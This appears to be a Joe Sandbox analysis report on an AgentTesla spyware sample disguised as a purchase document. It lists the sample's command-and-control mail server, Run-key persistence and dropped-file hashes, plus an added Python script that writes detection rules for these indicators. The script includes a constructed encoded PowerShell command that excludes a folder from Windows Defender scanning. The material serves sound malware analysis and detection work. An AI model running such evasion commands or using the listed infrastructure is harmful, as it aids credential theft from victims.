C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | 71% | ReversingLabs | Win32.Trojan.AgentTesla

No Antivirus matches
No Antivirus matches
URLs
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.yildiztepeenerji.com.tr | 77.245.148.65 | true | true | | unknown
241.42.69.40.in-addr.arpa | unknown | unknown | false | | unknown
26.165.165.52.in-addr.arpa | unknown | unknown | false | | unknown
_kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr | unknown | unknown | false | | unknown
URLs found in memory
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.yildiztepeenerji.com.tr | PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 00000005.00000002.1867946503.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.1948373451.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
77.245.148.65 | mail.yildiztepeenerji.com.tr | Turkey | 42868 | NIOBEBILISIMHIZMETLERITR | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1520405
                                    Start date and time:2024-09-27 10:42:07 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 41s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:PR 2500006515 972 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@17/9@4/1
                                    EGA Information:
                                    • Successful, ratio: 85.7%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 209
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6980 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Time | Type | Description
04:43:02 | API Interceptor | 7001428x Sleep call for process: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe modified
04:43:04 | API Interceptor | 11x Sleep call for process: powershell.exe modified
04:43:14 | API Interceptor | 5827672x Sleep call for process: ctsdvwT.exe modified
09:43:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
09:43:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
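The observations above (a Run-key entry pointing at a copy of the sample under %APPDATA%, a Windows Defender exclusion added through a base64-encoded PowerShell command, SMTP submission to the mail C2 on port 587, and a dropped file that hashes identically to the submitted sample) translate directly into host-triage checks. The script below is an added example and is not part of the Joe Sandbox report or of the malware: it encodes the report's indicators as rules and runs them over a few constructed Sysmon-style events. The Sysmon field names are real, but the event values, the HKU SID and the Defender exclusion path are assumptions made for illustration; the report does not state which directory was excluded.

```python
"""Host-triage rules derived from the indicators in this report.

Added example, not part of the Joe Sandbox report or of AgentTesla itself: it
turns the report's observations (Run-key persistence under %APPDATA%, a
base64-encoded Add-MpPreference exclusion, SMTP to the mail C2 on 587, a
dropped byte-identical copy of the sample) into checks and runs them over
constructed Sysmon-style events. Field names follow Sysmon; the sample
events, the SID and the exclusion path are assumptions for illustration.
"""
import base64
import re

# Indicators copied from the report.
SAMPLE_SHA256 = "f3dd8124dc20b5dbe2afde3eaa092c05e1eb0fae8fe16aaacfa9e0d5213f4117"
C2_HOSTS = {"mail.yildiztepeenerji.com.tr", "77.245.148.65"}
C2_PORT = 587
# Sysmon reports HKCU as HKU\<SID>, so match on the key tail rather than the hive name.
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\[^\\]+$", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind a PowerShell -EncodedCommand argument (base64 of
    UTF-16LE text), or None. powershell.exe accepts any unambiguous prefix of
    the flag (-e, -ec, -enc, ...), so prefixes are matched, not the full name."""
    parts = cmdline.split()
    for flag, value in zip(parts, parts[1:]):
        f = flag.lower()
        if f == "-ec" or (len(f) >= 2 and "-encodedcommand".startswith(f)):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def check_run_key(evt):
    """Sysmon 13 (RegistryEvent, value set): Run entry whose target is under AppData\\Roaming."""
    if evt.get("EventID") != 13:
        return None
    target, details = evt.get("TargetObject", ""), evt.get("Details", "")
    if RUN_KEY_RE.search(target) and "\\appdata\\roaming\\" in details.lower():
        return "run-key persistence: %s -> %s" % (target, details)
    return None


def check_defender_exclusion(evt):
    """Sysmon 1 (ProcessCreate): PowerShell adding a Defender exclusion, plain or
    base64-encoded (the MpPreference Sigma rule the report cites)."""
    image = evt.get("Image", "").lower()
    if evt.get("EventID") != 1 or not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    cmd = evt.get("CommandLine", "")
    script = decode_encoded_command(cmd) or cmd
    if re.search(r"add-mppreference\s.*-exclusion", script, re.I | re.S):
        return "defender exclusion added: " + script.strip()
    return None


def check_c2_smtp(evt):
    """Sysmon 3 (NetworkConnect): outbound SMTP submission to the report's mail C2."""
    if evt.get("EventID") != 3:
        return None
    dst = {evt.get("DestinationIp", ""), evt.get("DestinationHostname", "")}
    if dst & C2_HOSTS and int(evt.get("DestinationPort", 0)) == C2_PORT:
        return "SMTP exfiltration channel: %s -> %s:%d" % (evt.get("Image"), evt.get("DestinationIp"), C2_PORT)
    return None


def check_self_copy(evt):
    """Sysmon 15 (FileCreateStreamHash, fired for the Zone.Identifier stream the
    report lists): the dropped file hashes identical to the submitted sample."""
    if evt.get("EventID") != 15:
        return None
    hashes = dict(h.split("=", 1) for h in evt.get("Hash", "").split(",") if "=" in h)
    if hashes.get("SHA256", "").lower() == SAMPLE_SHA256:
        return "self-copy of sample dropped at " + evt.get("TargetFilename", "")
    return None


RULES = (check_run_key, check_defender_exclusion, check_c2_smtp, check_self_copy)


def triage(events):
    """Run every rule over every event and return the findings in event order."""
    findings = []
    for evt in events:
        for rule in RULES:
            hit = rule(evt)
            if hit:
                findings.append(hit)
    return findings


# Constructed events modelled on the report's behaviour graph (values assumed).
EXCLUSION_CMD = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\ctsdvwT"'  # path assumed
DROP_PATH = "C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -enc "
                    + base64.b64encode(EXCLUSION_CMD.encode("utf-16-le")).decode("ascii")},
    {"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ctsdvwT",
     "Details": DROP_PATH},
    {"EventID": 15, "TargetFilename": DROP_PATH + ":Zone.Identifier",
     "Hash": "SHA256=" + SAMPLE_SHA256.upper() + ",MD5=0362B41458CD2B19F542E3F3F040C547"},
    {"EventID": 3, "Image": DROP_PATH, "DestinationIp": "77.245.148.65",
     "DestinationHostname": "mail.yildiztepeenerji.com.tr", "DestinationPort": "587"},
    # Benign control: an ordinary PowerShell invocation must not match any rule.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The encoded-command decoder is the part worth keeping even outside this case: Windows PowerShell treats `-e`, `-ec` and any longer prefix of `-EncodedCommand` as the same switch, and the payload is UTF-16LE, so a rule that only matches the literal string `Add-MpPreference` in the raw command line misses exactly the variant this sample used.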
Context (IPs)
Match | Associated Sample Name / URL | Detection | Threat Name
77.245.148.65 | SKM_C3350i2402291223.bat.exe | malicious | AgentTesla

No context

Context (ASNs)
Match | Associated Sample Name / URL | Detection | Threat Name | Contacted IP
NIOBEBILISIMHIZMETLERITR | Contract_Agreement_Wednesday September 2024.pdf | malicious | Unknown | 77.245.159.9
NIOBEBILISIMHIZMETLERITR | Contract_Agreement_Tuesday September 2024.pdf | malicious | Unknown | 77.245.159.9
NIOBEBILISIMHIZMETLERITR | https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.php | malicious | Unknown | 77.245.159.21
NIOBEBILISIMHIZMETLERITR | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | malicious | Snake Keylogger | 77.245.159.7
NIOBEBILISIMHIZMETLERITR | file.exe | malicious | SystemBC | 77.245.149.25
NIOBEBILISIMHIZMETLERITR | #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exe | malicious | AgentTesla | 77.245.148.100
NIOBEBILISIMHIZMETLERITR | SKM_C3350i2402291223.bat.exe | malicious | AgentTesla | 77.245.148.65
NIOBEBILISIMHIZMETLERITR | Overdue Account Notice.exe | malicious | AgentTesla | 77.245.159.10
NIOBEBILISIMHIZMETLERITR | Product list.png.exe | malicious | AgentTesla | 77.245.159.10
NIOBEBILISIMHIZMETLERITR | NEW PURCHASE ORDER.png.exe | malicious | AgentTesla, PureLog Stealer | 77.245.159.10

No context

No context
                                      Process:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1172
                                      Entropy (8bit):5.354777075714867
                                      Encrypted:false
                                      SSDEEP:24:3gWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKIl9ia8Hu:QWSU4xympgv4RIoUP7mZ9tK8NDT
                                      MD5:EB8C2CED703FE31A6DAB409ABF320623
                                      SHA1:A7A9337EEBCEE8FF05DF4C76CB882356B7FF95C7
                                      SHA-256:3DFF0CCF5BEE6A7D0998C7CCF45D9DC4EB6C40EED9FE922EB9C87E0A0CE988DC
                                      SHA-512:547FC42688C26D319DF3820AD1BA17D288146FBDFA142904FB859BFCA9B18DD376315B94E7AC1C6779B568B52138D093A16B25DCDE3BE2AB6FC4DDD149898293
                                      Malicious:false
                                      Reputation:low
                                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1083392
                                      Entropy (8bit):7.9099962848519905
                                      Encrypted:false
                                      SSDEEP:24576:kTt1c89pBkpIjnQ0Pxthfv69Ay53xc6xoK4Lc/bLwbA6F36K:kKowpIpCOy53+LFM69
                                      MD5:0362B41458CD2B19F542E3F3F040C547
                                      SHA1:210E4B23A4CEBA122FB66F6C0ED92A534C852B57
                                      SHA-256:F3DD8124DC20B5DBE2AFDE3EAA092C05E1EB0FAE8FE16AAACFA9E0D5213F4117
                                      SHA-512:A3F0085B8D5EC44DFD34F9D9372D422A719174D50B6BC579DA57AD034336D67F917035CAD1E4A0F9111837E54FAB637546F07D0070E4131599CC507BB70F6BA2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{0.f..............0..f... ........... ........@.. ....................................@.................................T...O.......0............................i..T............................................ ............... ..H............text....e... ...f.................. ..`.rsrc...0............h..............@..@.reloc..............................@..B........................H.......H`...V......+... ...p..............................................}.....(.......(.......}.....{.....o7...o.......(.....*....0..e............o=...o.....+8..(.......{....o.....o....&.o......,..{......o.......X....(....-...........o......*...........EU.......0............{....o....(...+(...+.+..*..0..+.........,..{.......+....,...{....o........("....*..0..o.........s#...}.....s$...}.....s$...}.....s%...}.....s%...}.....(&.....{.....o'.....{......;s(...o).....{....r...po
                                      Process:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.9099962848519905
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      File size:1'083'392 bytes
                                      MD5:0362b41458cd2b19f542e3f3f040c547
                                      SHA1:210e4b23a4ceba122fb66f6c0ed92a534c852b57
                                      SHA256:f3dd8124dc20b5dbe2afde3eaa092c05e1eb0fae8fe16aaacfa9e0d5213f4117
                                      SHA512:a3f0085b8d5ec44dfd34f9d9372d422a719174d50b6bc579da57ad034336d67f917035cad1e4a0f9111837e54fab637546f07d0070e4131599cc507bb70f6ba2
                                      SSDEEP:24576:kTt1c89pBkpIjnQ0Pxthfv69Ay53xc6xoK4Lc/bLwbA6F36K:kKowpIpCOy53+LFM69
                                      TLSH:21351240E2986AC5D0AA43F7DC70F941137B7B57157CC62879BB708F84B27C261A2E6B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{0.f..............0..f... ........... ........@.. ....................................@................................
                                      Icon Hash:46992606071d1a94
                                      Entrypoint:0x5085a6
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66AB307B [Thu Aug 1 06:51:39 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x108554 | 0x4f | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10a000 | 0x1c30 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10c000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x106990 | 0x54 | .text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
